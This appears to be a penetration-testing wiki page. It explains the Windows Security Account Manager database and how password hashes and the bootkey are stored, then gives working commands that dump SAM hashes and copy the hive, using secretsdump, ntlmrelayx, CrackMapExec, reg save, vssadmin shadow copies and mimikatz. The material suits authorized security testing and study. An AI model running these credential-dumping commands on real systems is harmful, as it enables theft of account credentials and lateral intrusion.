SAM Base

Administrator rights on the target machine are mandatory.

What is SAM?

The Security Account Manager (SAM) stands as a fundamental component within Windows, entrusted with the storage and administration of local user and group accounts. This database file serves as the bedrock for authenticating local user logons.

What Purpose does SAM Serve?

The SAM database seamlessly engages as a background process upon system startup, working harmoniously in tandem with other processes and services. The realm of Windows computing offers two primary configurations: workgroup and domain. In the former, each computer maintains its individual SAM, housing data about local users and group accounts. Passwords linked with these accounts are meticulously hashed and securely stored within the SAM, a measure that inherently bolsters security and mitigates potential attack vulnerabilities. The Local Security Authority (LSA) assumes the role of verifying a user's logon attempt, cross-referencing their credentials against the data enshrined in the SAM. Successful logon hinges on the password entered aligning with the stored password in the local SAM.

Within domain-joined systems, two distinct logon types exist: local and domain-based. While local logons adhere to the principles outlined above, domain user logons leverage the Active Directory (AD) database coupled with the WinLogon service.

A Comprehensive Exploration of the SAM Hive

Delving into the SAM hive unveils its multi-faceted components, encryption methodologies, and the intricate process of extracting its secrets.

1. Key Components of the SAM Hive:

Users and Groups: The SAM hive encapsulates information about local users and groups, along with their corresponding security identifiers (SIDs). These entries establish the foundational building blocks of the Windows security framework.
Password Hashes: A crucial aspect of the SAM hive is its storage of password hashes for local accounts. User passwords are kept in the SAM registry either as an LM hash or an NT hash, depending on Group Policy settings. The LM hash is a vintage hashing technique that was created in 1987 and is enabled by default on Windows versions prior to Windows Vista/Windows Server 2008. However, because LM hashes are now deemed cryptographically unsafe, Microsoft recommends removing storage of all LM hashes whenever possible. An attacker might brute force the whole key space in a reasonably short period of time. If an attacker obtains the hashes, they can be readily broken using rainbow tables or a brute force password guessing assault within a few minutes.
Bootkey Encryption: To enhance security, the SAM hive encrypts password hashes using a bootkey. This bootkey, unique to each computer, is ingeniously derived from information contained within the HKLM\SYSTEM\CurrentControlSet\Control\Lsa registry key.

Extracting SAM Secrets

Secretdump:

secretsdump.py, from impacket suit can be used to extract the SAM database remotely:

python secretsdump.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>

NTLMRelayx:

SAM database can be dumped remotely through ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support

CrackMapExec:

It is possible to dump the SAM hashes using methods from secretsdump.py using CrackMapExec:

cme smb <TARGET> -u <USERNAME> -p <PASSWORD> --sam

To get a copy of the SAM registry hive, it is possible to use natives reg.exe or vssadmin (using shadow copy) command from a privileged shell with the following commands:

reg save HKLM\SAM sam_hive_backup
# or
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM SAM

Mimikatz:

Among the pantheon of powerful security tools, Mimikatz stands tall, providing the capability to extract SAM secrets:

mimikatz.exe "lsadump::sam /system:<SYSTEM_HIVE> /sam:<SAM_HIVE> /bootkey:<BOOTKEY>"

PreviousDumping NextLSA Secrets

Last updated 8 months ago